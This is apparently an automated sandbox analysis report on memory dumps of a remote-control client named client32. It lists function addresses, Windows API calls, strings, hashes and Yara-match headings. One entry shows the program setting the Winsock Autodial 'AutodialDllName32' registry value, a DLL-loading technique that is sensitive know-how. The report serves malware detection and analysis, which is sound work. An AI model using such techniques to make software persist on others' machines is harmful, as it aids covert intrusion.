                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                              • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                              • API String ID: 3515807602-1044166025
                                                                              • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                              • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                              Function 1105035C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 187windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 110505B5
                                                                              • PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 110505C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostWindow
                                                                              • String ID: 10.21.0.0$Client$Disconnect(%p), closing player$ReconnectDelay
                                                                              • API String ID: 3618638489-3222940297
                                                                              • Opcode ID: 56d0403b3980d3986053706dd81e3e4ace557baac3e2369d8f785017eea65476
                                                                              • Instruction ID: af3b4c147a4513b3c39047db549f56ac60d38a2ab96126e405b75e909720095d
                                                                              • Opcode Fuzzy Hash: 56d0403b3980d3986053706dd81e3e4ace557baac3e2369d8f785017eea65476
                                                                              • Instruction Fuzzy Hash: 8D61A479A022525BEB95DFA0CCC4FBAB7A8AF4570CF1441F8E9094F299CB75B440CB61
                                                                              Function 110040F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11004130
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110041A7
                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110041D2
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110041FE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableWindow$ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2354609054-2830328467
                                                                              • Opcode ID: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                              • Instruction ID: c13629e3a69401f36b1837560bfd6e90eee75297420fac0ab380ec534ade091b
                                                                              • Opcode Fuzzy Hash: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                              • Instruction Fuzzy Hash: AC318BB5A40309ABE720DF55CC86F9AF3E4FB4C708F108569E91AA7680D7B4B8008B94
                                                                              Function 11064340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?), ref: 1106436E
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 11064396
                                                                              • RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111EE741,00000010), ref: 11064480
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 1106448D
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Value$CloseOpenQueryVersion
                                                                              • String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
                                                                              • API String ID: 387276457-2283657482
                                                                              • Opcode ID: aa4cde0aa82c8723e533341a8807f67dc9b88c45f56a7f544780993e07b50a5c
                                                                              • Instruction ID: 375109a592318106ba114329bda040cb1860311447808832b59f0ce0bf7a2c6e
                                                                              • Opcode Fuzzy Hash: aa4cde0aa82c8723e533341a8807f67dc9b88c45f56a7f544780993e07b50a5c
                                                                              • Instruction Fuzzy Hash: EA31A374E516689FEB61CF90CC89FAAF7BDFB05308F0040D8E55896145EB705945CF51
                                                                              Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                              • IsWindow.USER32(?), ref: 1103D17E
                                                                              • SendMessageA.USER32(?,0000004A,00040270,00000492), ref: 1103D1B8
                                                                              • _free.LIBCMT ref: 1103D1BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                              • String ID: Show16
                                                                              • API String ID: 625148989-2844191965
                                                                              • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                              • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                              • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                              • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                              Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                              • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                              • API String ID: 2735369351-763374134
                                                                              • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                              • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                              • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                              • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                              Function 11002070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMAnnotate), ref: 11002094
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 110020EA
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 110020F4
                                                                              • GetSystemMetrics.USER32(00000000), ref: 11002109
                                                                              • GetSystemMetrics.USER32(00000001), ref: 11002113
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$AtomGlobal
                                                                              • String ID: NSMAnnotate
                                                                              • API String ID: 1775358667-1587977882
                                                                              • Opcode ID: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                              • Instruction ID: c7367c546af50a4de639236848e5e5652b6277b92aa1928d07c4543d278ba0f2
                                                                              • Opcode Fuzzy Hash: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                              • Instruction Fuzzy Hash: 2021AFB0901B549FD321DF6A8984696FBE8FFA4754F00491FD2AA87A20D7B5A440CF44
                                                                              Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                              • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                              • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                              • _free.LIBCMT ref: 1100B3C8
                                                                              • _free.LIBCMT ref: 1100B3CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                              • String ID:
                                                                              • API String ID: 705253285-0
                                                                              • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                              • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                              • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                              • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                              Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                              • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                              • API String ID: 2776021309-3012761530
                                                                              • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                              • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                              • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                              • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                              Function 1116C548 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DD208,00000008,1116C650,00000000,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C559
                                                                              • __lock.LIBCMT ref: 1116C58D
                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                              • InterlockedIncrement.KERNEL32(111ECF10), ref: 1116C59A
                                                                              • __lock.LIBCMT ref: 1116C5AE
                                                                              • ___addlocaleref.LIBCMT ref: 1116C5CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                              • String ID: KERNEL32.DLL
                                                                              • API String ID: 637971194-2576044830
